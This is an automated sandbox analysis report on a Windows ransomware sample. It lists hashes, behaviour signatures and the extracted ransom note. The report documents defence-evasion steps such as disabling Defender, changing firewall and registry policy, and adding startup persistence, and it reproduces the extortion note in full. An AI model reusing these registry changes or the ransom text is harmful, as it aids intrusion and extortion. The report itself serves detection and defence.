2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
133s
max time network
147s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Size

367KB
MD5

b31f6216e6bc5a6291a0b82de0377553
SHA1

0afdc5359268f7e78a0ca3c3c67752edd304a742
SHA256

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb
SHA512

7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Hello. Your files, documents, photo, databases and all the rest aren't REMOVED. They are ciphered by the most reliable enciphering. It is impossible to restore files without our help. You will try to restore files independent you will lose files FOREVER. ---------------------------------------------------------- You will be able to restore files so: 1. to contact us by e-mail: [email protected] * report your ID and we will switch off any removal of files (if don't report your ID identifier, then each 24 hours will be to be removed on 24 files. If report to ID-we will switch off it) * you send your ID identifier and 2 files, up to 2 MB in size everyone. We decipher them, as proof of a possibility of interpretation. also you receive the instruction where and how many it is necessary to pay. 2. you pay and confirm payment. 3. after payment you receive the DECODER program. which you restore ALL YOUR FILES. ---------------------------------------------------------- If you have not been answered within 24 hours by mail, use the backup link. To do this: 1. Download TOX at https ://tox.chat/clients.html 2. Sign up (takes 1 minute) 3. Add a contact. Our TOX contact - B9131B8B3AAB24F72F0DBB1783AB54231E1756277455F52BC404AD769BF83B372F13A039708F You have 72 hours on payment. If you don't manage to pay in 72 hours, then the price of interpretation increases twice. The price increases twice each 72 hours. To restore files, without loss, and on the minimum tariff, you have to pay within 72 hours. Address for detailed instructions e-mail: [email protected] If you don't waste time for attempts to decipher, then you will be able to restore all files in 1 hour. If you try to decipher - you can FOREVER lose your files. Key Identifier: i4owRhbeLHl50VZKaHHkoZFP0ebjIfqQnoe2zf6ziooPwo9MW9OmubGukHsn+ex0KZjeLk0aT1/mUC5AnanHFocxgIoXL0o2lnRUqf40g5C3kNbVhxYn3OyldNOY9l0d8eFx3/oA6RqLi8O4uqiTbFiMCJhBwn3/v4jjLW5hVFw2GuIsFp7ZizmCxb5axs15dz3Ogrg+EDv+3mH0SQwgRAQDzPKNfOxAkJuMMObVCieCWBKVeBXlI+Vtak3HGzChWrvmmj+tJ9b8Qxokp6rjlZvyUOmYojtw0XyMsOmGGP4sritoAQfpF9bs1JzWrbdhFhA9MImV6U2kAmBlQcjWS4Stuc9Xqwyk7cG4JYiSqkDBBUaA5nH2yeDIoWYJVnX2/XvgzR5YYFpQB+Zh3f7gpa7oT+2mZwoUxSYmnwYllw3k2mQ9NXgc2xeWj3DXjziZvbnS8r0tXVTHTaoj+Zj+EQc2GVkSUTLKQEJXkulP3vuHjfMJpXHyYx/gH1WRaKLFVZOZw5SxULBOdrTZZUXHaV6fc4dJjzZNVceMVo3oAfs+U8zWqgjRHIYH7yGr3dG5NWlOfgawFsG0uiSM6emBsTgch5wdcr8Ze63hOn/j5mq6WVsQr1ZNnpCEBNQ+JkZJtucnctebITOLHbmefSF7f/H/vipZzzPwkyfE2bPPW8M=

Emails

[email protected]

URLs

https

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Modifies file permissions 1 TTPs 36 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1248	icacls.exe
1764	icacls.exe
1052	icacls.exe
1596	icacls.exe
652	icacls.exe
1756	icacls.exe
892	icacls.exe
760	icacls.exe
1616	icacls.exe
1648	icacls.exe
968	icacls.exe
1856	icacls.exe
840	icacls.exe
1776	icacls.exe
340	icacls.exe
340	icacls.exe
1248	icacls.exe
1960	icacls.exe
560	icacls.exe
668	icacls.exe
860	icacls.exe
1144	icacls.exe
1012	icacls.exe
776	icacls.exe
800	icacls.exe
1912	icacls.exe
644	icacls.exe
1760	icacls.exe
756	icacls.exe
824	icacls.exe
1160	icacls.exe
1068	icacls.exe
1568	icacls.exe
1648	icacls.exe
644	icacls.exe
1100	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Attention Attention Attention!"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Good afternoon. Do you have any difficulties at work?\r\nDo not worry, our IT specialists will help you.\r\nTo do this, please email us.\r\n\r\nOur email - [email protected]"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 54 IoCs

evasion

pid	Process
932	taskkill.exe
1176	taskkill.exe
1704	taskkill.exe
1248	taskkill.exe
2024	taskkill.exe
1208	taskkill.exe
532	taskkill.exe
1472	taskkill.exe
1556	taskkill.exe
1368	taskkill.exe
1932	taskkill.exe
644	taskkill.exe
776	taskkill.exe
1144	taskkill.exe
932	taskkill.exe
1012	taskkill.exe
1300	taskkill.exe
1348	taskkill.exe
1616	taskkill.exe
1932	taskkill.exe
1924	taskkill.exe
1208	taskkill.exe
1012	taskkill.exe
1348	taskkill.exe
956	taskkill.exe
1276	taskkill.exe
788	taskkill.exe
1944	taskkill.exe
1348	taskkill.exe
1208	taskkill.exe
652	taskkill.exe
1432	taskkill.exe
1160	taskkill.exe
1704	taskkill.exe
1424	taskkill.exe
1472	taskkill.exe
956	taskkill.exe
1944	taskkill.exe
1308	taskkill.exe
1652	taskkill.exe
756	taskkill.exe
1716	taskkill.exe
1176	taskkill.exe
1596	taskkill.exe
328	taskkill.exe
1612	taskkill.exe
968	taskkill.exe
668	taskkill.exe
1704	taskkill.exe
800	taskkill.exe
1276	taskkill.exe
1596	taskkill.exe
2024	taskkill.exe
1184	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1308	reg.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
1944	PING.EXE
644	PING.EXE
328	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeDebugPrivilege	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Token: SeDebugPrivilege	1480	Process not Found
Token: SeDebugPrivilege	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Token: SeDebugPrivilege	644	PING.EXE
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	328	arp.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	776	conhost.exe
Token: SeDebugPrivilege	1012	conhost.exe
Token: SeDebugPrivilege	788	taskkill.exe
Token: SeDebugPrivilege	668	conhost.exe
Token: SeDebugPrivilege	1704	conhost.exe
Token: SeDebugPrivilege	2024	conhost.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	800	taskkill.exe
Token: SeDebugPrivilege	1944	PING.EXE
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1012	conhost.exe
Token: SeDebugPrivilege	1596	cmd.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	1932	cmd.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1704	conhost.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1368	conhost.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	1248	icacls.exe
Token: SeDebugPrivilege	532	conhost.exe
Token: SeDebugPrivilege	1616	icacls.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	1944	PING.EXE
Token: SeDebugPrivilege	1144	icacls.exe
Token: SeDebugPrivilege	1160	netsh.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	1932	cmd.exe
Token: SeDebugPrivilege	1704	conhost.exe
Token: SeDebugPrivilege	1652	conhost.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	1596	cmd.exe
Token: SeDebugPrivilege	2024	conhost.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	1752	conhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1084 wrote to memory of 396	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	30
PID 1084 wrote to memory of 396	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	30
PID 1084 wrote to memory of 396	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	30
PID 1084 wrote to memory of 1480	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	32
PID 1084 wrote to memory of 1480	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	32
PID 1084 wrote to memory of 1480	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	32
PID 1084 wrote to memory of 644	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	185
PID 1084 wrote to memory of 644	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	185
PID 1084 wrote to memory of 644	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	185
PID 1084 wrote to memory of 1704	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	189
PID 1084 wrote to memory of 1704	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	189
PID 1084 wrote to memory of 1704	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	189
PID 1084 wrote to memory of 1308	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	140
PID 1084 wrote to memory of 1308	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	140
PID 1084 wrote to memory of 1308	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	140
PID 1084 wrote to memory of 1176	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	145
PID 1084 wrote to memory of 1176	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	145
PID 1084 wrote to memory of 1176	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	145
PID 1084 wrote to memory of 860	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	42
PID 1084 wrote to memory of 860	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	42
PID 1084 wrote to memory of 860	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	42
PID 1084 wrote to memory of 1204	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	75
PID 1084 wrote to memory of 1204	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	75
PID 1084 wrote to memory of 1204	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	75
PID 1084 wrote to memory of 1248	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	175
PID 1084 wrote to memory of 1248	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	175
PID 1084 wrote to memory of 1248	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	175
PID 1084 wrote to memory of 672	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	195
PID 1084 wrote to memory of 672	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	195
PID 1084 wrote to memory of 672	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	195
PID 1084 wrote to memory of 544	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	194
PID 1084 wrote to memory of 544	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	194
PID 1084 wrote to memory of 544	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	194
PID 1084 wrote to memory of 1348	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	128
PID 1084 wrote to memory of 1348	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	128
PID 1084 wrote to memory of 1348	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	128
PID 1084 wrote to memory of 1540	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	55
PID 1084 wrote to memory of 1540	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	55
PID 1084 wrote to memory of 1540	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	55
PID 1084 wrote to memory of 788	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	78
PID 1084 wrote to memory of 788	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	78
PID 1084 wrote to memory of 788	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	78
PID 1084 wrote to memory of 968	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	138
PID 1084 wrote to memory of 968	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	138
PID 1084 wrote to memory of 968	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	138
PID 1084 wrote to memory of 1996	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	143
PID 1084 wrote to memory of 1996	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	143
PID 1084 wrote to memory of 1996	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	143
PID 1084 wrote to memory of 1208	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	160
PID 1084 wrote to memory of 1208	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	160
PID 1084 wrote to memory of 1208	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	160
PID 1084 wrote to memory of 956	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	118
PID 1084 wrote to memory of 956	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	118
PID 1084 wrote to memory of 956	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	118
PID 1084 wrote to memory of 328	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	200
PID 1084 wrote to memory of 328	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	200
PID 1084 wrote to memory of 328	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	200
PID 1084 wrote to memory of 652	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	68
PID 1084 wrote to memory of 652	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	68
PID 1084 wrote to memory of 652	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	68
PID 1084 wrote to memory of 1212	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	181
PID 1084 wrote to memory of 1212	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	181
PID 1084 wrote to memory of 1212	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	181
PID 1084 wrote to memory of 932	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	150

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Attention Attention Attention!"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Good afternoon. Do you have any difficulties at work?\r\nDo not worry, our IT specialists will help you.\r\nTo do this, please email us.\r\n\r\nOur email - [email protected]"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
1⤵
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
